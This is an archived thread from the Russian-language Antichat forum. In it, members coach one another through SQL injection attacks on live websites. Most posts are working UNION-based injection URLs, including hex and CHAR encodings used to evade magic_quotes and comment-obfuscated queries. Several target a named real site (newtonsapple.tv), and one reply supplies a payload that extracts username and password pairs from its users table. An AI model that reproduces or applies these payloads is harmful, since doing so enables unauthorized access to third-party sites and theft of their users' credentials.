ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
13.01.2013, 18:09
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Сообщение от comynicator
comynicator said:
Допустим нужно узнать привилегии но magic_quotes=on
Понимаю или чарить или хек.Вопрос пробиваю user() пишет Future_future2@localhost
Что именно тут имя юзера? Полностью или до @?И как вставить имя в хек или чар?
User - Future_future2
HEX - 0x4675747572655f66757475726532
CHAR(MySQL) - CHAR(70, 117, 116, 117, 114, 101, 95, 102, 117, 116, 117, 114, 101, 50)
|
|
|
13.01.2013, 18:24
|
|
Guest
Сообщений: n/a
Провел на форуме:
3687
Репутация:
0
|
|
Сообщение от cat1vo
cat1vo said:
User -
Future_future2
HEX -
0x4675747572655f66757475726532
CHAR(MySQL) -
CHAR(70, 117, 116, 117, 114, 101, 95, 102, 117, 116, 117, 114, 101, 50)
Спасибо за ответ.вот зачарено
http://www.site.com/fin-detail.php?id=173/**/union/**/all/**/select/**/1,file_priv,3,4,5,6,7,8,9,10,11/**/from/**/mysql.user/**/where/**/user=char(70,117,116,117,114,101,95,102,117,116,11 7,114,101,50)--
Ответ
SELECT command denied to user 'Future_future2'@'localhost' for table 'user'
Вот хек
http://www.site.com/fin-detail.php?id=173/**/union/**/all/**/select/**/1,file_priv,3,4,5,6,7,8,9,10,11/**/from/**/mysql.user/**/where/**/user=0x4675747572655f66757475726532--
ответ
SELECT command denied to user 'Future_future2'@'localhost' for table 'user'
|
|
|
|
13.01.2013, 18:38
|
|
Участник форума
Регистрация: 13.07.2008
Сообщений: 101
Провел на форуме:
346497
Репутация:
303
|
|
Сообщение от comynicator
comynicator said:
Спасибо за ответ.вот зачарено
http://www.site.com/fin-detail.php?id=173/**/union/**/all/**/select/**/1,file_priv,3,4,5,6,7,8,9,10,11/**/from/**/mysql.user/**/where/**/user=char(70,117,116,117,114,101,95,102,117,116,11 7,114,101,50)--
Ответ
SELECT command denied to user 'Future_future2'@'localhost' for table 'user'
Вот хек
http://www.site.com/fin-detail.php?id=173/**/union/**/all/**/select/**/1,file_priv,3,4,5,6,7,8,9,10,11/**/from/**/mysql.user/**/where/**/user=0x4675747572655f66757475726532--
ответ
SELECT command denied to user 'Future_future2'@'localhost' for table 'user'
А матчасть почитать сначала??? Ясно же написано что вышеуказанный пользователь не имеет прав на доступ к системной таблице mysql!
|
|
|
|
14.01.2013, 23:56
|
|
Guest
Сообщений: n/a
Провел на форуме:
109228
Репутация:
124
|
|
Здравствуйте, помогите, туплю. http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,group_concat(table_nam e),12,13,14,15+from+information_schema.tables+--+ есть таблица ltw_usersv4, в ней есть колонка username, пытаюсь достать ее так: http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,username,12,13,14,15+f rom+ltw_usersv4+limit+0,1+--+ и ничего не получаю. Что я делаю не так? Заранее благодарен.
|
|
|
|
15.01.2013, 00:10
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Сообщение от FunOfGun
FunOfGun said:
Здравствуйте, помогите, туплю.
http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,group_concat(table_nam e),12,13,14,15+from+information_schema.tables+--+
есть таблица
ltw_usersv4
, в ней есть колонка
username
, пытаюсь достать ее так:
http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,username,12,13,14,15+f rom+ltw_usersv4+limit+0,1+--+
и ничего не получаю. Что я делаю не так? Заранее благодарен.
Код:
Code:
http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,username,password),12,13,14,15+from+Marketing.ltw_usersv4--+
Эта таблица находится в другой бд, в твоей ничего подобного нет. Учти другая БД - может быть другой сайт!
|
|
|
|
15.01.2013, 00:29
|
|
Guest
Сообщений: n/a
Провел на форуме:
109228
Репутация:
124
|
|
Сообщение от cat1vo
cat1vo said:
Код:
Code:
http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,username,password),12,13,14,15+from+Marketing.ltw_usersv4--+
Эта таблица находится в другой бд, в твоей ничего подобного нет. Учти другая БД - может быть другой сайт! Еще один глупый вопрос: как определить к какой именно базе прнадлежит таблица?
|
|
|
|
15.01.2013, 03:56
|
|
Участник форума
Регистрация: 27.08.2008
Сообщений: 209
Провел на форуме:
1759582
Репутация:
394
|
|
FunOfGun,
Код:
Code:
http://www.newtonsapple.tv/video.php?id=1g671'/*!union*/select+1,2,3,4,5,6,7,8,9,10,table_schema,12,13,14,15+from+information_schema.tables+where+table_name='ltw_usersv4'+--+
|
|
|
|
15.01.2013, 12:01
|
|
Guest
Сообщений: n/a
Провел на форуме:
2965
Репутация:
10
|
|
Сообщение от FunOfGun
FunOfGun said:
Еще один глупый вопрос: как определить к какой именно базе прнадлежит таблица?
вытаскивай просто таблицы подобными запросами:
SELECT table_schema,table_name FROM information_schema.tables WHERE table_schema != ‘mysql’ AND table_schema != ‘information_schema’
Узнать текущую базу:
SELECT database()
|
|
|
|
18.01.2013, 22:21
|
|
Guest
Сообщений: n/a
Провел на форуме:
46989
Репутация:
20
|
|
 Как раскрутить? Запрос был '+order+by+100 |
|
|
|
18.01.2013, 23:05
|
|
Новичок
Регистрация: 12.08.2009
Сообщений: 1
Провел на форуме:
11937
Репутация:
0
|
|
Сообщение от Vip77
Vip77 said:
Как раскрутить? Запрос был '+order+by+100 Т.К. url сайта Вы не даете, тогда могу только так помочь:
Код:
Code:
%')") ЗДЕСЬ ВАШ ЗАПРОС -- -
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
